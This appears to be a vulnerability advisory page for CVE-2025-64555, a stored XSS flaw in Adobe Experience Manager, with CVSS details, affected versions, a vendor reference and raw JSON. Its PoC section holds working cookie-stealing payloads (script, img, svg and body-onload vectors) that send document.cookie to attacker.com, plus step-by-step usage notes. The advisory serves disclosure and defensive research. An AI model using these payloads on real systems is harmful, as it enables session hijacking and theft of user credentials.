Security Vulnerability Report
CVE-2025-64555 CVSS 5.4 MEDIUM

Published: 2025-12-10 19:16:17
Last Modified: 2025-12-12 19:56:08

Description

Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:* - VULNERABLE
cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:* - VULNERABLE
Adobe Experience Manager 6.5.23 and earlier
Adobe Experience Manager < 6.5.24

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
HTML
<!-- CVE-2025-64555 Stored XSS PoC for Adobe Experience Manager -->
<!-- This PoC demonstrates the XSS vulnerability in AEM form fields -->

<!-- Step 1: Inject malicious script into a vulnerable form field -->
<!-- Use this payload when submitting form data in AEM -->
<script>
  // Steal session cookies
  var stolenCookies = document.cookie;
  // Send stolen data to attacker-controlled server
  fetch('https://attacker.com/steal?c=' + encodeURIComponent(stolenCookies), {
    method: 'GET',
    mode: 'no-cors'
  });
  // Alternative payload - alert demonstration
  alert('XSS Vulnerability - CVE-2025-64555');
</script>

<!-- Step 2: Image tag XSS payload (bypasses some filters) -->
<img src=x onerror="this.src='https://attacker.com/log?cookie='+document.cookie">

<!-- Step 3: SVG XSS payload -->
<svg/onload=fetch('https://attacker.com/steal?data='+btoa(document.cookie))>

<!-- Step 4: Event handler XSS -->
<body onload="fetch('https://attacker.com/capture?session='+document.cookie)">

<!-- Usage Notes:
  1. Identify form fields in Adobe Experience Manager
  2. Submit the payload as field value
  3. When any user views the page containing the field, script executes
  4. Check for successful cookie/log data exfiltration -->

<!-- Remediation: Upgrade to Adobe Experience Manager 6.5.24 or later -->

References

https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-64555",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-10T19:16:17.433",
    "lastModified": "2025-12-12T19:56:08.270",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-79"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:*",
                "versionEndExcluding": "6.5.24.0",
                "matchCriteriaId": "0FC0CE20-2AC2-45FB-A7CF-9ADEEBC8B411"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:*",
                "versionEndExcluding": "2025.12.0",
                "matchCriteriaId": "3326AB8A-7DF7-437C-86B6-58BA768E42E5"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:*",
                "matchCriteriaId": "852C2582-859F-40DB-96CF-E1274CEECC1F"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}